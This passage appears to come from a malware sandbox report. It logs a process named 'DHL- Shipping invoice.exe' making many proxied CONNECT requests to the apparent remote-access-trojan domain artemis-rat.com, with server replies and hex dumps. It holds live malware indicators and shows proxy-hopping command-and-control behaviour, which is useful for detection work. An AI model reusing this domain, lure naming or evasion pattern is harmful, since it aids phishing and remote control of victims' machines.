                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.671952009 CET75INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Length: 0
                            Mar 12, 2024 08:37:02.673039913 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 f0 06 1d e9 33 12 d1 7f df 28 8b 40 27 42 f1 ab 8b 2f 84 cc 9f 63 18 e0 80 d1 1a 11 2e 81 5b 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                            Data Ascii: lhe3(@'B/c.[*,+0/$#('=<5/artemis-rat.com#78H#L=<z>Gx@&&#u:eU|M"q!
                            Mar 12, 2024 08:37:03.575074911 CET103INHTTP/1.1 400 Bad Request
                            Content-Type: text/plain; charset=utf-8
                            Connection: close
                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                            Data Ascii: 400 Bad Request


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            835192.168.2.452611121.159.146.251806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.169545889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            836192.168.2.450128121.130.172.15331286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.208410025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.622373104 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            837192.168.2.45261647.243.114.19281806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.209125042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            838192.168.2.451795185.23.118.252551586484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.231085062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.319613934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            839192.168.2.452607103.166.39.936296484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.232254982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            840192.168.2.45276172.195.34.35273606484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.252002954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.750026941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            841192.168.2.452626119.3.215.4188886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.252305984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            842192.168.2.452746162.214.191.59585886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.252794981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.840630054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.453171015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.640815020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.860702991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.240042925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.453336000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.953288078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:24.953113079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            843192.168.2.45276898.175.31.19541456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.252865076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.710931063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            844192.168.2.452767177.93.45.1549996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.254298925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.229175091 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            845192.168.2.4526795.190.220.23531286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.254599094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            846192.168.2.450182160.153.245.187385866484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.265615940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.359163046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            847192.168.2.452780174.75.211.22241456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.274600983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            848192.168.2.450189213.16.81.14756786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.274914026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            849192.168.2.452763185.82.218.5210806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.293816090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            850192.168.2.45031262.171.131.101294976484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.295269012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.359322071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            851192.168.2.451869146.59.18.246306736484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.299798012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.359319925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            852192.168.2.45264243.133.136.20888006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.304249048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            853192.168.2.45263238.54.116.931286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.306010962 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:04.665674925 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            854192.168.2.452620103.49.202.252806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.318275928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            855192.168.2.451765103.83.252.6110806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.319304943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            856192.168.2.451805213.14.32.6741536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.319673061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            857192.168.2.452702102.132.201.202806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.319878101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.637047052 CET343INHTTP/1.1 400 Bad Request
                            Server: nginx/1.14.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html
                            Content-Length: 182
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            858192.168.2.45277852.151.210.20490006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.320137024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            859192.168.2.452739105.235.197.162540666484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.350996971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            860192.168.2.451806198.8.94.174390786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.351042986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            861192.168.2.45278295.43.244.1541536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.354700089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            862192.168.2.4527063.37.125.7631286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.354708910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.688766956 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            863192.168.2.45027751.15.133.214163796484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.354860067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.612731934 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            864192.168.2.45037151.15.209.188163796484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.354865074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.453026056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.453807116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.004343987 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            865192.168.2.45196651.89.173.40545706484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.354928970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
